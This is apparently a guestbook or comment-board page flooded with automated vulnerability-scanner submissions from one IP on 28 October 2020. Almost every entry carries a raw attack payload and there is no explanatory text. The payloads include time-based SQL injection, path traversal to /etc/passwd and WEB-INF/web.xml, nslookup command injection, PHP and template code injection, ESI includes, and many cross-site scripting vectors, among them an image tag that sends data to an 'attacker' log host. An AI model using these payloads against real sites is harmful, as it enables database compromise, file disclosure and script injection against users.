Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 18:58:09

1

GRLpGpAG [http://hitCGUSsJa6uj.bxss.me/] 2020-10-28 18:58:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:09

HttP://testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [create] 2020-10-28 18:58:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:08

1

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 18:58:08

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 18:58:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:08

1

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 18:58:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:07

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 18:58:07

1

!(()&&!|*|*| [116.113.93.82] 2020-10-28 18:58:07

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 18:58:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:06

1

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 18:58:06

1

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 18:58:06

1

) [116.113.93.82] 2020-10-28 18:58:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:05

testasp.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:05

1

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 18:58:04

1

'"() [116.113.93.82] 2020-10-28 18:58:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:04

^(#$!@#$)(()))******

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 18:58:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:04

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 18:58:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:03

!(()&&!|*|*|

Array [116.113.93.82] 2020-10-28 18:58:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:03

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:02

)

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:02

'"()

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:01

1some_inexistent_file_with_long_name.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:01

Array

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 18:58:01

1

GRLpGpAG&n932408=v980986 [116.113.93.82] 2020-10-28 18:58:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:58:00

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 18:57:59

1

Array [116.113.93.82] 2020-10-28 18:57:59

1

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 18:57:59

1

Array [116.113.93.82] 2020-10-28 18:57:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:58

1&n934145=v917564

GRLpGpAG ['"()] 2020-10-28 18:57:58

1

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 18:57:58

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 18:57:58

1

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 18:57:58

1

GRLpGpAG [Array] 2020-10-28 18:57:57

1

Зочин [116.113.93.82] 2020-10-28 18:57:57

1

GRLpGpAG [file:///etc/passwd] 2020-10-28 18:57:57

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 18:57:57

1

QnVSczd4NmU= [116.113.93.82] 2020-10-28 18:57:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:56

Array

GRLpGpAG [)] 2020-10-28 18:57:56

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 18:57:56

1

GRLpGpAG [116.113.93.82&n901536=v991205] 2020-10-28 18:57:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:55

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 18:57:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:55

Array

GRLpGpAG [..] 2020-10-28 18:57:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:53

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 18:57:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:53

12345'"\'\");|]*{ <>

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 18:57:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:53

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 18:57:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:52

1

GRLpGpAG [U04IKWeB'));select pg_sleep(3); -- ] 2020-10-28 18:57:52

1

${10000400+10000437} [116.113.93.82] 2020-10-28 18:57:52

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 18:57:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:52

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 18:57:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:51

${10000048+10000034}

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 18:57:51

1

GRLpGpAG [5liC9y9r');select pg_sleep(9); -- ] 2020-10-28 18:57:51

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 18:57:50

1

GRLpGpAG [wHTPiIj2';select pg_sleep(6); -- ] 2020-10-28 18:57:50

1

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 18:57:50

1

GRLpGpAG [${9999401+9999332}] 2020-10-28 18:57:49

1

GRLpGpAG [/etc/passwd] 2020-10-28 18:57:49

1

GRLpGpAG [IdPWBtD2'; waitfor delay '0:0:6' -- ] 2020-10-28 18:57:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:49

1

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 18:57:48

1

"+response.write(9832360*9311986)+" [116.113.93.82] 2020-10-28 18:57:48

1

GRLpGpAG [1 waitfor delay '0:0:3' -- ] 2020-10-28 18:57:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:48

1

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 18:57:48

1

&nslookup dP0HMH2o&'\"`0&nslookup dP0HMH2o&`' [116.113.93.82] 2020-10-28 18:57:47

1

'+response.write(9832360*9311986)+' [116.113.93.82] 2020-10-28 18:57:47

1

GRLpGpAG [Array] 2020-10-28 18:57:47

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 18:57:47

1

GRLpGpAG [(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/] 2020-10-28 18:57:47

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 18:57:47

1

$(nslookup SB8VlwVC) [116.113.93.82] 2020-10-28 18:57:46

1

GRLpGpAG [Array] 2020-10-28 18:57:46

1

response.write(9832360*9311986) [116.113.93.82] 2020-10-28 18:57:46

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 18:57:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:46

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 18:57:45

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 18:57:44

1

set|set&set [116.113.93.82] 2020-10-28 18:57:44

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z] 2020-10-28 18:57:44

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 18:57:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:44

"+response.write(9935772*9218133)+"

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:43

&nslookup Md1X7EYa&'\"`0&nslookup Md1X7EYa&`'

GRLpGpAG [] 2020-10-28 18:57:43

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 18:57:43

1

GRLpGpAG [if(now()=sysdate(),sleep(9),0)] 2020-10-28 18:57:43

1

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 18:57:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:43

'+response.write(9935772*9218133)+'

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:42

$(nslookup VYITw8ps)

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 18:57:42

1

GRLpGpAG [-1" OR 2+691-691-1=0+0+0+1 -- ] 2020-10-28 18:57:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:42

response.write(9935772*9218133)

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:41

set|set&set

GRLpGpAG [-1' OR 2+138-138-1=0+0+0+1 or 'aEeWKOnA'='] 2020-10-28 18:57:41

1

4FSXwuJk [116.113.93.82] 2020-10-28 18:57:40

1

GRLpGpAG [-1' OR 2+454-454-1=0+0+0+1 -- ] 2020-10-28 18:57:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:39

TXwoJgG0

GRLpGpAG [-1 OR 2+218-218-1=0+0+0+1] 2020-10-28 18:57:39

1

GRLpGpAG [-1 OR 2+254-254-1=0+0+0+1 -- ] 2020-10-28 18:57:38

1

GRLpGpAG [viCW6D3T] 2020-10-28 18:57:38

1

GRLpGpAG ["+response.write(9647555*9202516)+"] 2020-10-28 18:57:38

1

GRLpGpAG [&nslookup GhXwoKYR&'\"`0&nslookup GhXwoKYR&`'] 2020-10-28 18:57:38

1

GRLpGpAG [SfjEepau] 2020-10-28 18:57:37

1

GRLpGpAG ['+response.write(9647555*9202516)+'] 2020-10-28 18:57:37

1

GRLpGpAG [$(nslookup RWvCuObq)] 2020-10-28 18:57:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:36

1

GRLpGpAG [set|set&set] 2020-10-28 18:57:35

1

GRLpGpAG [response.write(9647555*9202516)] 2020-10-28 18:57:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:57:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:51:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:31:36

1

GRLpGpAG"><script>ExlD(9980)</script> [116.113.93.82] 2020-10-28 15:31:33

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(ExlD(9570))'bad=" [116.113.93.82] 2020-10-28 15:31:29

1

[116.113.93.82] 2020-10-28 15:31:26

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%45%78%6C%44%28%39%35%38%39%29%22 [116.113.93.82] 2020-10-28 15:31:18

1

GRLpGpAG\u0022onmouseover=ExlD(9515)\u0022 [116.113.93.82] 2020-10-28 15:31:14

1

GRLpGpAG" suGb=ExlD([!+!]) tZn=" [116.113.93.82] 2020-10-28 15:31:10

1

GRLpGpAG"onmouseover=ExlD(9922)" [116.113.93.82] 2020-10-28 15:31:06

1

GRLpGpAG<m85DHu< [116.113.93.82] 2020-10-28 15:31:03

1

GRLpGpAG<img sRc='http://attacker-9150/log.php? [116.113.93.82] 2020-10-28 15:30:59

1

GRLpGpAG<ZJEQzl x=9527> [116.113.93.82] 2020-10-28 15:30:51

1

GRLpGpAG<ifRAme sRc=9441.com></IfRamE> [116.113.93.82] 2020-10-28 15:30:47

1

GRLpGpAG<WELW2Q>GFQPF[!+!]</WELW2Q> [116.113.93.82] 2020-10-28 15:30:37

1

GRLpGpAGxxXeH <ScRiPt >ExlD(9214)</ScRiPt> [116.113.93.82] 2020-10-28 15:30:20

1

GRLpGpAG<% contenteditable onresize=ExlD(9697)> [116.113.93.82] 2020-10-28 15:29:57

1

GRLpGpAG}body{acu:Expre/**/SSion(ExlD(9588))} [116.113.93.82] 2020-10-28 15:29:53

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9358);//><!-- --> [116.113.93.82] 2020-10-28 15:29:47

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 15:29:44

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 15:29:41

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 15:29:36

1

GRLpGpAG<input autofocus onfocus=ExlD(9419)> [116.113.93.82] 2020-10-28 15:29:27

1

[116.113.93.82] 2020-10-28 15:29:22

1

GRLpGpAG<ScRiPt>ExlD(9901)</sCripT> [116.113.93.82] 2020-10-28 15:29:19

1

GRLpGpAG\u003CScRiPt\ExlD(9306)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 15:29:12

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%45%78%6C%44%289309%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 15:29:09

1

GRLpGpAG<img/src=">" onerror=alert(9552)> [116.113.93.82] 2020-10-28 15:29:02

1

GRLpGpAG<img src=xyz OnErRor=ExlD(9004)> [116.113.93.82] 2020-10-28 15:28:58

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=ExlD(9406)> [116.113.93.82] 2020-10-28 15:28:39

1

GRLpGpAG<body onload=ExlD(9143)> [116.113.93.82] 2020-10-28 15:28:35

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9404'> [116.113.93.82] 2020-10-28 15:28:31

1

GRLpGpAG<isindex type=image src=1 onerror=ExlD(9230)> [116.113.93.82] 2020-10-28 15:28:24

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 15:28:17

1

GRLpGpAG<video><source onerror="javascript:ExlD(9723)"> [116.113.93.82] 2020-10-28 15:28:14

1

GRLpGpAG<ScRiPt >ExlD(9375)</ScRiPt> [116.113.93.82] 2020-10-28 15:28:10

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9722></ScRiPt> [116.113.93.82] 2020-10-28 15:28:05

1

GRLpGpAG<ScRiPt >ExlD(9463)</ScRiPt> [116.113.93.82] 2020-10-28 15:27:58

1

GRLpGpAG<ScR<ScRiPt>IpT>ExlD(9072)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 15:27:51

1

GRLpGpAG<script>ExlD(9619)</script> [116.113.93.82] 2020-10-28 15:27:48

1

GRLpGpAG<WCJILQ>MQ6SL[!+!]</WCJILQ> [116.113.93.82] 2020-10-28 15:27:43

1

GRLpGpAG<ScRiPt >ExlD(9894)</ScRiPt> [116.113.93.82] 2020-10-28 15:27:37

1

{{9999229*9999549}} [116.113.93.82] 2020-10-28 15:27:11

1

acux5510 [116.113.93.82] 2020-10-28 15:27:00

1

acu5213<s1﹥s2ʺs3ʹuca5213 [116.113.93.82] 2020-10-28 15:26:57

1

{{9999101*9999418}} [116.113.93.82] 2020-10-28 15:26:54

1

acux5360 [116.113.93.82] 2020-10-28 15:26:44

1

acu8474<s1﹥s2ʺs3ʹuca8474 [116.113.93.82] 2020-10-28 15:26:40

1

GRLpGpAG9753658 [116.113.93.82] 2020-10-28 15:26:28

1

'"()&%<acx><ScRiPt >ExlD(9432)</ScRiPt> [116.113.93.82] 2020-10-28 15:25:44

1

GRLpGpAG'"()&%<acx><ScRiPt >ExlD(9949)</ScRiPt> [116.113.93.82] 2020-10-28 15:25:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:25:34

1<4NxprM<

GRLpGpAG [116.113.93.82] 2020-10-28 15:25:26

1<img sRc='http://attacker-9484/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 15:25:22

1<Xqtr45 x=9787>

GRLpGpAG [116.113.93.82] 2020-10-28 15:25:19

1<ifRAme sRc=9494.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 15:25:11

1<W488BN>NT878[!+!]</W488BN>

GRLpGpAG [116.113.93.82] 2020-10-28 15:25:02

1VXKN3 <ScRiPt >ExlD(9385)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:55

1<% contenteditable onresize=ExlD(9921)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:51

1}body{acu:Expre/**/SSion(ExlD(9374))}

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:42

1<img<!-- --> src=x onerror=alert(9068);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:38

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:35

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:32

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:27

1<input autofocus onfocus=ExlD(9295)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:24

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:21

1<ScRiPt>ExlD(9902)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:18

1\u003CScRiPt\ExlD(9529)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:15

%31%3C%53%63%52%69%50%74%20%3E%45%78%6C%44%289439%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:10

1<img/src=">" onerror=alert(9883)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:07

1<img src=xyz OnErRor=ExlD(9389)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:24:00

1<img src=//testasp.vulnweb.com/t/dot.gif onload=ExlD(9106)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:23:55

1<body onload=ExlD(9539)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:23:52

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9646'>

GRLpGpAG [116.113.93.82] 2020-10-28 15:23:33

1<isindex type=image src=1 onerror=ExlD(9292)>

GRLpGpAG [116.113.93.82] 2020-10-28 15:23:24

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 15:23:22

1<video><source onerror="javascript:ExlD(9181)">

GRLpGpAG [116.113.93.82] 2020-10-28 15:23:14

1<ScRiPt >ExlD(9304)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:23:00

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9930></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:22:53

1<ScRiPt >ExlD(9252)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:22:36

1<ScR<ScRiPt>IpT>ExlD(9159)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 15:22:28

1<script>ExlD(9198)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 15:22:24

1<W3W2ZP>RYXAW[!+!]</W3W2ZP>

GRLpGpAG [116.113.93.82] 2020-10-28 15:22:17

1<ScRiPt >ExlD(9439)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:22:03

{{9999132*10000178}}

GRLpGpAG [116.113.93.82] 2020-10-28 15:21:57

acux2608

GRLpGpAG [116.113.93.82] 2020-10-28 15:21:53

acu4302<s1﹥s2ʺs3ʹuca4302

GRLpGpAG [116.113.93.82] 2020-10-28 15:21:48

19659463

GRLpGpAG [116.113.93.82] 2020-10-28 15:21:39

'"()&%<acx><ScRiPt >ExlD(9205)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 15:21:34

1'"()&%<acx><ScRiPt >ExlD(9648)</ScRiPt>

GRLpGpAG [116.113.93.82<kC4sA1<] 2020-10-28 15:21:27

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9780/log.php?] 2020-10-28 15:21:23

1

GRLpGpAG [116.113.93.82<cnZ39W x=9581>] 2020-10-28 15:21:16

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9987.com></IfRamE>] 2020-10-28 15:21:13

1

GRLpGpAG [116.113.93.82<WNLE54>XNXEZ[!+!]</WNLE54>] 2020-10-28 15:21:08

1

GRLpGpAG [116.113.93.82a72IU <ScRiPt >ExlD(9319)</ScRiPt>] 2020-10-28 15:21:01

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=ExlD(9516)>] 2020-10-28 15:20:57

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(ExlD(9324))}] 2020-10-28 15:20:46

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9638);//><!-- -->] 2020-10-28 15:20:34

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 15:20:31

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 15:20:24

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 15:20:21

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 15:20:20

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 15:20:19

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 15:20:18

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 15:20:18

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=ExlD(9332)>] 2020-10-28 15:20:16

1

file:///etc/passwd [116.113.93.82] 2020-10-28 15:20:15

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 15:20:12

1

.. [116.113.93.82] 2020-10-28 15:20:11

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 15:20:09

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 15:20:08

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 15:20:07

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 15:20:06

1

GRLpGpAG [] 2020-10-28 15:20:05

1

/etc/passwd [116.113.93.82] 2020-10-28 15:20:03

1

GRLpGpAG [116.113.93.82<ScRiPt>ExlD(9232)</sCripT>] 2020-10-28 15:20:01

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 15:20:01

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 15:19:59

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 15:19:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:58

1

GRLpGpAG [116.113.93.82\u003CScRiPt\ExlD(9496)\u003C/sCripT\u003E] 2020-10-28 15:19:58

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 15:19:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:56

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 15:19:55

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 15:19:54

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%45%78%6C%44%289066%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 15:19:54

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 15:19:50

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9908)>] 2020-10-28 15:19:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:47

WEB-INF\web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:45

WEB-INF/web.xml

XfHDNXYf'));select pg_sleep(14); -- [116.113.93.82] 2020-10-28 15:19:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:44

/WEB-INF/web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:43

/\../\../\../\../\../\../\../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:42

file:///etc/passwd

8OLZAkzG');select pg_sleep(14); -- [116.113.93.82] 2020-10-28 15:19:41

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=ExlD(9699)>] 2020-10-28 15:19:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:40

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:38

..

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:37

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

8rs2dKyF';select pg_sleep(14); -- [116.113.93.82] 2020-10-28 15:19:36

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=ExlD(9742)>] 2020-10-28 15:19:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:33

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Rvo5J6f8'; waitfor delay '0:0:14' -- [116.113.93.82] 2020-10-28 15:19:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:32

/.././.././.././.././.././.././.././../etc/./passwd%00

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:30

%2fetc%2fpasswd

1 waitfor delay '0:0:7' -- [116.113.93.82] 2020-10-28 15:19:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:26

/etc/passwd

(select(0)from(select(sleep(21)))v)/*'+(select(0)from(select(sleep(21)))v)+'"+(select(0)from(select(sleep(21)))v)+"*/ [116.113.93.82] 2020-10-28 15:19:25

1

GRLpGpAG [116.113.93.82<body onload=ExlD(9497)>] 2020-10-28 15:19:25

1

0"XOR(if(now()=sysdate(),sleep(21),0))XOR"Z [116.113.93.82] 2020-10-28 15:19:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:19:23

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

0'XOR(if(now()=sysdate(),sleep(21),0))XOR'Z [116.113.93.82] 2020-10-28 15:19:23

1

if(now()=sysdate(),sleep(21),0) [116.113.93.82] 2020-10-28 15:19:20

1

-1" OR 2+747-747-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 15:19:19

1

